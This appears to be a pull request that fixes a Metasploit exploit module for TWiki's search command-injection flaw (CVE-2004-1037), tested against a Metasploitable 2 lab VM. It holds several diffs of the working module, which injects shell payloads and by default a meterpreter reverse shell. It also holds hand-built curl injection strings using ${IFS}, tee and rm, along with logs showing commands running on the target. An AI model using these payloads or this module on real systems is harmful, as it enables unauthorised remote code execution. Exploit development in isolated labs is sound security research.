### PR TITLE
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support

### DIFF
--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -36,16 +36,16 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'BID', '11674' ],
           [ 'URL', 'https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
         ],
+        'DisclosureDate' => '2004-10-01',
         'Privileged' => true, # web server context
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
         'Payload' => {
           'DisableNops' => true,
           'BadChars' => ' ',
-          'Space' => 1024,
+          'Space' => 1024
         },
-        'Platform' => [ 'unix' ],
-        'Arch' => ARCH_CMD,
         'Targets' => [[ 'Automatic', {}]],
-        'DisclosureDate' => '2004-10-01',
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -68,10 +68,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     content = rand_text_alphanumeric(16 + rand(16))
     test_file = rand_text_alphanumeric(8 + rand(8))
-    cmd_base = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
-    cmd_base << '?search='
     test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
-    vprint_status("URI: #{cmd_base}")
+    search_url = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
+    search_url << '?search='
+    vprint_status("URI: #{search_url}")
 
     # first see if it already exists (it really shouldn't)
     res = send_request_raw({
@@ -86,16 +86,17 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Attempting to create: #{test_url}")
     search = rand_text_alphanumeric(1 + rand(8))
     search << "';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#'"
+    uri = search_url + Rex::Text.uri_encode(search)
 
     res = send_request_raw({
-      'uri' => cmd_base + Rex::Text.uri_encode(search)
+      'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       return Exploit::CheckCode::Safe
     end
 
-    # try to run it, 500 code == successfully made it
+    # try to call it
     vprint_status("Checking if created: #{test_url}")
     res = send_request_raw({
       'uri' => test_url
@@ -110,9 +111,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting to delete: #{test_url}")
     search = rand_text_alphanumeric(1 + rand(8))
     search << "';rm${IFS}-f${IFS}" + test_file + ".txt;#'"
+    uri = search_url + Rex::Text.uri_encode(search)
 
     res = send_request_raw({
-      'uri' => cmd_base + Rex::Text.uri_encode(search)
+      'uri' => uri
     }, 25)
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
@@ -123,25 +125,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    search = rand_text_alphanumeric(1 + rand(8))
-    search << "';" + payload.encoded + ";#'"
+    search_url = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
+    search_url << '?search='
+    search_url << rand_text_alphanumeric(1 + rand(8))
+    vprint_status("URI: #{search_url}")
 
-    query_str = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
-    vprint_status("URI: #{query_str}")
-    query_str << '?search='
-    query_str << Rex::Text.uri_encode(search)
+    search = "';" + payload.encoded + ";#'"
+    vprint_status("Executing command: #{payload.encoded}")
 
     vprint_status("Sending payload")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => query_str,
+    res = send_request_raw({
+      'uri' => uri
     }, 25)
     vprint_status("Payload sent")
 
     fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
     fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
-    print_good("Exploit complete")
-
-    handler
   end
 end

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # try to create it
     vprint_status("Attempting to create #{test_url} ...")
-    search = rand_text_numeric(1 + rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
+    search = rand_text_numeric(1 + rand(5)) + "\';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#\'"
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(search)
     }, 25)

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -51,6 +51,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
+        # /view/Main/WebSearch      - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9
+        # /search/Main/SearchResult - https://www.exploit-db.com/exploits/642
+        OptString.new('SEARCH_PATH', [ true, "TWiki search directory path", "/search/Main/SearchResult" ]),
       ]
     )
   end
@@ -58,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     content = rand_text_alphanumeric(16 + rand(16))
     test_file = rand_text_alphanumeric(8 + rand(8))
-    cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=')
+    cmd_base = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
+    cmd_base << '?search='
     test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
 
     # first see if it already exists (it really shouldn't)
@@ -105,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     search = rand_text_alphanumeric(1 + rand(8))
     search << "';" + payload.encoded + ";#\'"
 
-    query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch')
+    query_str = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
     query_str << '?search='
     query_str << Rex::Text.uri_encode(search)
 

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -84,7 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # try to create it
     vprint_status("Attempting to create: #{test_url}")
-    search = rand_text_numeric(1 + rand(5)) + "\';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#\'"
+    search = rand_text_alphanumeric(1 + rand(8))
+    search << "';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#'"
+
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(search)
     }, 25)
@@ -106,7 +108,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # delete the tmp file
     print_status("Attempting to delete: #{test_url}")
-    search = rand_text_numeric(1 + rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
+    search = rand_text_alphanumeric(1 + rand(8))
+    search << "';rm${IFS}-f${IFS}" + test_file + ".txt;#'"
+
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(search)
     }, 25)
@@ -120,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     search = rand_text_alphanumeric(1 + rand(8))
-    search << "';" + payload.encoded + ";#\'"
+    search << "';" + payload.encoded + ";#'"
 
     query_str = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
     vprint_status("URI: #{query_str}")

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -47,9 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [[ 'Automatic', {}]],
         'DefaultTarget' => 0,
-        'DefaultOptions' => {
-          'MeterpreterTryToFork' => true # Meterpreter payloads open then fail without Prepend forks
-        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,
@@ -68,10 +65,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def send_request(uri)
+  def send_request(uri, timeout = 25)
     send_request_cgi({
       'uri' => uri
-    }, 25)
+    }, timeout)
   end
 
   def check
@@ -131,10 +128,16 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing command: #{payload.encoded}")
 
     vprint_status("Sending payload")
-    res = send_request(search_url + Rex::Text.uri_encode(search))
+    # Very short timeout because the request may never return if we're sending a socket payload
+    timeout = 0.1
+    res = send_request(search_url + Rex::Text.uri_encode(search), timeout)
     vprint_status("Payload sent")
 
-    fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
-    fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+    # Due to short timeout, may take longer to get a response/shell/session, so not a big deal if this fails
+    if res.nil?
+      vprint_warning("The request received no response in the allotted time, and is expected, even if the exploit succeeds.")
+    elsif res.code != 200
+      vprint_error("Error with payload request (HTTP #{res.code}, should be 200)")
+    end
   end
 end

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -65,6 +65,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def send_request(uri)
+    send_request_cgi({
+      'uri' => uri
+    }, 25)
+  end
+
   def check
     content = rand_text_alphanumeric(16 + rand(16))
     test_file = rand_text_alphanumeric(8 + rand(8))
@@ -74,9 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("URI: #{search_url}")
 
     # first see if it already exists (it really shouldn't)
-    res = send_request_raw({
-      'uri' => test_url
-    }, 25)
+    res = send_request(test_url)
     if (not res) or (res.body.match(content))
       vprint_warning("The test file exists already!")
       return Exploit::CheckCode::Unknown # Need to try again with a different file
@@ -86,11 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Attempting to create: #{test_url}")
     search = rand_text_alphanumeric(1 + rand(8))
     search << "';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#'"
-    uri = search_url + Rex::Text.uri_encode(search)
-
-    res = send_request_raw({
-      'uri' => uri
-    }, 25)
+    res = send_request(search_url + Rex::Text.uri_encode(search))
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       return Exploit::CheckCode::Safe
@@ -98,9 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # try to call it
     vprint_status("Checking if created: #{test_url}")
-    res = send_request_raw({
-      'uri' => test_url
-    }, 25)
+    res = send_request(test_url)
     if (not res) or (not res.body.match(content))
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 500)") unless res.code == 500
       vprint_warning("Error with exploit request (Content doesn't match)") unless res.body.match(content)
@@ -111,11 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting to delete: #{test_url}")
     search = rand_text_alphanumeric(1 + rand(8))
     search << "';rm${IFS}-f${IFS}" + test_file + ".txt;#'"
-    uri = search_url + Rex::Text.uri_encode(search)
-
-    res = send_request_raw({
-      'uri' => uri
-    }, 25)
+    res = send_request(search_url + Rex::Text.uri_encode(search))
     if (not res) or (res.code != 200)
       vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       print_warning("Unable to remove test file (#{test_file})")
@@ -134,9 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing command: #{payload.encoded}")
 
     vprint_status("Sending payload")
-    res = send_request_raw({
-      'uri' => uri
-    }, 25)
+    res = send_request(search_url + Rex::Text.uri_encode(search))
     vprint_status("Payload sent")
 
     fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -134,11 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 25)
     vprint_status("Payload sent")
 
-    if (res and res.code == 200)
-      print_good("Successfully sent exploit request")
-    else
-      fail_with(Failure::Unknown, "Error sending exploit request")
-    end
+    fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
+    fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+    print_good("Exploit complete")
 
     handler
   end

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -15,8 +15,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'TWiki Search Function Arbitrary Command Execution',
         'Description' => %q{
           This module exploits a vulnerability in the search component of TWiki.
-          By passing a 'search' parameter containing shell metacharacters to the
-          'WebSearch' script, an attacker can execute arbitrary OS commands.
+          By passing a 'search' parameter containing shell metacharacters to a
+          'Search' script, an attacker can execute arbitrary OS commands.
+
+          Affected versions:
+          - 20040901
+          - 20030201
+          - 20011201
+          - 20001201
+          - SVN up to and including revision 3224
         },
         'Author' => [
           # Unknown - original discovery
@@ -27,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2004-1037' ],
           [ 'OSVDB', '11714' ],
           [ 'BID', '11674' ],
-          [ 'URL', 'http://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
+          [ 'URL', 'https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
         ],
         'Privileged' => true, # web server context
         'Payload' => {

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2004-10-01',
         'Privileged' => true, # web server context
-        'Platform' => [ 'unix' ],
+        'Platform' => %w[unix linux],
         'Arch' => ARCH_CMD,
         'Payload' => {
           'DisableNops' => true,
@@ -47,6 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [[ 'Automatic', {}]],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'MeterpreterTryToFork' => true # Meterpreter payloads open then fail without Prepend forks
+        },
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd_base = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
     cmd_base << '?search='
     test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
+    vprint_status("URI: #{cmd_base}")
 
     # first see if it already exists (it really shouldn't)
     res = send_request_raw({
@@ -82,31 +83,36 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # try to create it
-    vprint_status("Attempting to create #{test_url} ...")
+    vprint_status("Attempting to create: #{test_url}")
     search = rand_text_numeric(1 + rand(5)) + "\';echo${IFS}" + content + "${IFS}|tee${IFS}" + test_file + ".txt;#\'"
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(search)
     }, 25)
     if (not res) or (res.code != 200)
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
       return Exploit::CheckCode::Safe
     end
 
     # try to run it, 500 code == successfully made it
+    vprint_status("Checking if created: #{test_url}")
     res = send_request_raw({
       'uri' => test_url
     }, 25)
     if (not res) or (not res.body.match(content))
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 500)") unless res.code == 500
+      vprint_warning("Error with exploit request (Content doesn't match)") unless res.body.match(content)
       return Exploit::CheckCode::Safe
     end
 
     # delete the tmp file
-    print_status("Attempting to delete #{test_url} ...")
+    print_status("Attempting to delete: #{test_url}")
     search = rand_text_numeric(1 + rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
     res = send_request_raw({
       'uri' => cmd_base + Rex::Text.uri_encode(search)
     }, 25)
     if (not res) or (res.code != 200)
-      vprint_warning("WARNING: unable to remove test file (#{test_file})")
+      vprint_warning("Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
+      print_warning("Unable to remove test file (#{test_file})")
     end
 
     return Exploit::CheckCode::Vulnerable
@@ -117,13 +123,16 @@ class MetasploitModule < Msf::Exploit::Remote
     search << "';" + payload.encoded + ";#\'"
 
     query_str = normalize_uri(datastore['URI'], datastore['SEARCH_PATH'])
+    vprint_status("URI: #{query_str}")
     query_str << '?search='
     query_str << Rex::Text.uri_encode(search)
 
+    vprint_status("Sending payload")
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => query_str,
     }, 25)
+    vprint_status("Payload sent")
 
     if (res and res.code == 200)
       print_good("Successfully sent exploit request")


### PR DESCRIPTION
I recently started to play with again with your, [Metasploitable 2](https://docs.rapid7.com/metasploit/metasploitable-2/) VM.

## Setup

**!!! Spoiler warning !!!**
_(Even if metasploitable 2 was released in 2012-June!)_

- Host: `10.0.0.1` (via `tap0`)
- Target: `10.0.0.10`
- VM: `metasploitable-linux-2.0.0.zip` (via `QEMU`)

```console
$ dpkg -l | grep metasploit-framework
ii  metasploit-framework                             6.4.110-0kali1                            amd64        Framework for exploit development and vulnerability research
$
```

_Full disclosure: I've never administrated or really used a TWiki instance before, and its been a while since coding a MSF module..._

## Background

There is a copy of TWiki running at: [10.0.0.10/twiki/](http://10.0.0.10/twiki/).
Looking about, you can see [`01 Feb 2003`](http://10.0.0.10/twiki/readme.txt) for latest changes, hinting at its version aka `2003-02-01` aka `20030201`.

Now, searching for exploits:

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0'
[...]
msf > search TWiki

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/webapp/moinmoin_twikidraw  2012-12-30       manual     Yes    MoinMoin twikidraw Action Traversal File Upload
   1  exploit/unix/http/twiki_debug_plugins   2014-10-09       excellent  Yes    TWiki Debugenableplugins Remote Code Execution
   2  exploit/unix/webapp/twiki_history       2005-09-14       excellent  Yes    TWiki History TWikiUsers rev Parameter Command Execution
   3  exploit/unix/webapp/twiki_maketext      2012-12-15       excellent  Yes    TWiki MAKETEXT Remote Command Execution
   4  exploit/unix/webapp/twiki_search        2004-10-01       excellent  Yes    TWiki Search Function Arbitrary Command Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/twiki_search

msf >
```

...for some reason, I started with `exploit/unix/webapp/twiki_search` (with no reason than working from the bottom up):

```console
msf > info exploit/unix/webapp/twiki_search

       Name: TWiki Search Function Arbitrary Command Execution
     Module: exploit/unix/webapp/twiki_search
[...]
Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the search component of TWiki.
  By passing a 'search' parameter containing shell metacharacters to the
  'WebSearch' script, an attacker can execute arbitrary OS commands.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2004-1037
  OSVDB (11714)
  http://www.securityfocus.com/bid/11674
  http://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
[...]
msf >
```

The description doesn't say what version(s) are vulnerable/affected.
So looking at the [disclosure from the author/project/dev/upstream](https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch).
Affected versions:

- `20040901`
- `20030201` <--- Match!
- `20011201`
- `20001201`
- `SVN up to and including revision 3224`

It also has a patch/hotfix for it.

So in theory, metasploitable 2 should be vulnerable to it.

## Issue

Let's check:

```console
msf > use exploit/unix/webapp/twiki_search
[*] No payload configured, defaulting to cmd/unix/php/meterpreter/reverse_tcp
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > options

Module options (exploit/unix/webapp/twiki_search):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /twiki/bin       yes       TWiki bin directory path
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > check
[*] Attempting to create /twiki/bin/view/Main/koOPf3mXBQ ...
[*] 10.0.0.10:80 - The target is not exploitable.
msf exploit(unix/webapp/twiki_search) >
```

Its failing.

## Debugging

After a bit of trying, I SSH into the box and looked at the Apache logs when it was running:

```console
msfadmin@metasploitable:$ tail -f /var/log/apache2/*
==> /var/log/apache2/access.log <==
10.0.0.1 - - [07/Feb/2026:07:36:05 -0500] "GET /twiki/bin/view/Main/1xwkdFnvjgBS HTTP/1.1" 200 4892 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"
10.0.0.1 - - [07/Feb/2026:07:36:06 -0500] "GET /twiki/bin/view/Main/WebSearch?search=97%27%3becho%24%7bIFS%7dAl5uh9Pkr6oBdlGRYeG82KLrOLs%24%7bIFS%7d%3e1xwkdFnvjgBS.txt%3b%23%27 HTTP/1.1" 200 4872 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"
10.0.0.1 - - [07/Feb/2026:07:36:06 -0500] "GET /twiki/bin/view/Main/1xwkdFnvjgBS HTTP/1.1" 200 4892 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"
```

As I didn't setup the lab, wasn't sure if it SHOULD be vulnerable to it (to me, it made sense, given the nature of metasploitable).
Wasn't 100% sure of the version, or if the patch/hotfix was applied.
So after getting the original setup (SHA512: `27bdf460d75cdbb7c3802519c4541177be707641dcff053cd223856e825dcdb467330b70e3d86f4f9df7a7a872a205c60cf06ce4b1f876127b965647e147c8d2`), I diff the web root and it.
On first glace, it appears to be the original/untouched/unaltered `v20030201`, with a few misc diff between them. Couldn't see a patch.
The MD5 of `Search.pm` matched on both - meaning its completely untouched.

So now strongly believed there was an issue/bug with Metasploit exploit.

After checking to see if the disclosure had a PoC linked, used Exploit-DB.

```console
$ searchsploit twiki
---------------------------------------------------------------------------- -------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- -------------------
[...]
TWiki 20030201 - 'search.pm' Remote Command Execution                       | cgi/webapps/642.pl
[...]
---------------------------------------------------------------------------- -------------------
Shellcodes: No Results
$
$ searchsploit -p cgi/webapps/642.pl
  Exploit: TWiki 20030201 - 'search.pm' Remote Command Execution
      URL: https://www.exploit-db.com/exploits/642
     Path: /usr/share/exploitdb/exploits/cgi/webapps/642.pl
    Codes: OSVDB-11714, CVE-2004-1037
[...]
$
$ perl /usr/share/exploitdb/exploits/cgi/webapps/642.pl
Proof of concept for TWiki vulnerability. Remote code execution.
(c) RoMaNSoFt, 2004. <roman@rs-labs.com>

You must specify a target hostname! (tip: --host <hostname>)

Syntax: ./tweaky.pl --host=<host> [options]

Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar
Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar
Secure HTTP (HTTPS): --secure
Path to CGI: --path=/cgi-bin/twiki/search/Main/
Method: --get | --post
Enable logging: --logfile=/path/to/a/file
Create PHPShell: --phpshellpath=/path/to/phpshell
$
```

Let's give it a try:

```console
$ perl /usr/share/exploitdb/exploits/cgi/webapps/642.pl --host=10.0.0.10 --path=/twiki/bin/search/Main/SearchResult
Proof of concept for TWiki vulnerability. Remote code execution.
(c) RoMaNSoFt, 2004. <roman@rs-labs.com>

Sorry, exploit didn't work!
Perhaps TWiki is patched or you supplied a wrong URL
(remember it should point to Twiki's search page).
$
```

However, checking the Apache logs:

```console
==> /var/log/apache2/access.log <==
10.0.0.1 - - [07/Feb/2026:07:36:51 -0500] "POST /twiki/bin/search/Main/SearchResult HTTP/1.1" 200 2329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

==> /var/log/apache2/error.log <==
[Sat Feb 07 07:36:51 2026] [error] [client 10.0.0.1] [Sat Feb  7 07:36:51 2026] search: Day too big - 36525 > 24855
[Sat Feb 07 07:36:51 2026] [error] [client 10.0.0.1] [Sat Feb  7 07:36:51 2026] search: Sec too small - 36525 < 74752
[Sat Feb 07 07:36:51 2026] [error] [client 10.0.0.1] [Sat Feb  7 07:36:51 2026] search: Sec too big - 36525 > 11647
[Sat Feb 07 07:36:51 2026] [error] [client 10.0.0.1] [Sat Feb  7 07:36:51 2026] search: Cannot handle date (0, 00, 00, 01, 0, 2070) at ../lib/TWiki.pm line 1015
```

Now, there's two different paths in the request (as well as GET vs POST):
- `/twiki/bin/search/Main/SearchResult` - `642.pl`
- `/twiki/bin/view/Main/WebSearch` - `exploit/unix/webapp/twiki_search`

Time to bring out cURL and have a go doing it "by hand manually":

Looking at the payload being sent:

- Encoded: `?search=97%27%3becho%24%7bIFS%7dAl5uh9Pkr6oBdlGRYeG82KLrOLs%24%7bIFS%7d%3e1xwkdFnvjgBS.txt%3b%23%27`
- Decoded: `?search=97';echo${IFS}Al5uh9Pkr6oBdlGRYeG82KLrOLs${IFS}>1xwkdFnvjgBS.txt;#'`

Wasn't sure if it was a blind vulnerability, so the first payload was sleep 10 and see if the response too longer than normal.

- Decoded: `?search=9';sleep${IFS}10;#'`
- Encoded: `?search=9%27%3bsleep%24%7bIFS%7d10%3b%23%27`

```console
$ time curl -s http://10.0.0.10/twiki/bin/view/Main/WebSearch?search=9%27%3bsleep%24%7bIFS%7d10%3b%23%27 >/dev/null
real  0.06s
[....]
$
$ time curl -s http://10.0.0.10/twiki/bin/search/Main/SearchResult?search=9%27%3bsleep%24%7bIFS%7d10%3b%23%27 >/dev/null
real  10.05s
[...]
$
```

Bingo.
This means that Metasploitable 2 is vulnerable to it!
Now to fix the exploit.

- Decoded: `?search=9';echo${IFS}foo>/tmp/bar;#'`
- Encoded: `?search=9%27%3becho%24%7bIFS%7dfoo%3E%2Ftmp%2Fbar%3b%23%27`

```console
$ curl -s http://10.0.0.10/twiki/bin/search/Main/SearchResult?search=9%27%3becho%24%7bIFS%7dfoo%3E%2Ftmp%2Fbar%3b%23%27 >/dev/null
==> /var/log/apache2/error.log <==
[Sat Feb 07 10:19:41 2026] [error] [client 10.0.0.1] sh: gt: command not found
[Sat Feb 07 10:19:41 2026] [error] [client 10.0.0.1] sh: /tmp/bar: No such file or directory
[Sat Feb 07 10:19:41 2026] [error] [client 10.0.0.1] [Sat Feb  7 10:19:41 2026] search: Use of uninitialized value in string ne at ../lib/TWiki/Search.pm line 302.
```

`>` is "greater than" aka `gt`.
_This matches the original Apache error._

- Decoded: `?search=9';echo${IFS}foo|tee${IFS}/tmp/bar;#'`
- Encoded: `?search=9%27%3becho%24%7bIFS%7dfoo%7Ctee%24%7bIFS%7d%2Ftmp%2Fbar%3b%23%27`

```console
$ curl -s http://10.0.0.10/twiki/bin/search/Main/SearchResult?search=9%27%3becho%24%7bIFS%7dfoo%7Ctee%24%7bIFS%7d%2Ftmp%2Fbar%3b%23%27 >/dev/null
==> /var/log/apache2/access.log <==
10.0.0.1 - - [07/Feb/2026:10:24:42 -0500] "GET /twiki/bin/search/Main/SearchResult?search=9%27%3becho%24%7bIFS%7dfoo%7Ctee%24%7bIFS%7d%2Ftmp%2Fbar%3b%23%27 HTTP/1.1" 200 3009 "-" "curl/8.18.0"

==> /var/log/apache2/error.log <==
[Sat Feb 07 10:24:42 2026] [error] [client 10.0.0.1] [Sat Feb  7 10:24:42 2026] search: Use of uninitialized value in string ne at ../lib/TWiki/Search.pm line 302.
^C
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ cat /tmp/bar
foo
msfadmin@metasploitable:~$
```

Boom!

**Summary: If we switch to using `| tee` we can write to a file WITHOUT using `>`.**

- - -

**Bonus #1**: Given the Exploit-DB uses a different path, rather than having it hardcoded as it previously was, moved it to a variable, `SEARCH_PATH`.

- - -

**Bonus #2**: Added "dropper" support, as its more "stable" (Exploit time is quicker & doesn't report exploit fails)

## PoC

### Before

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_search; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] No payload configured, defaulting to cmd/unix/php/meterpreter/reverse_tcp

Module options (exploit/unix/webapp/twiki_search):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /twiki/bin       yes       TWiki bin directory path
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic


msf exploit(unix/webapp/twiki_search) >
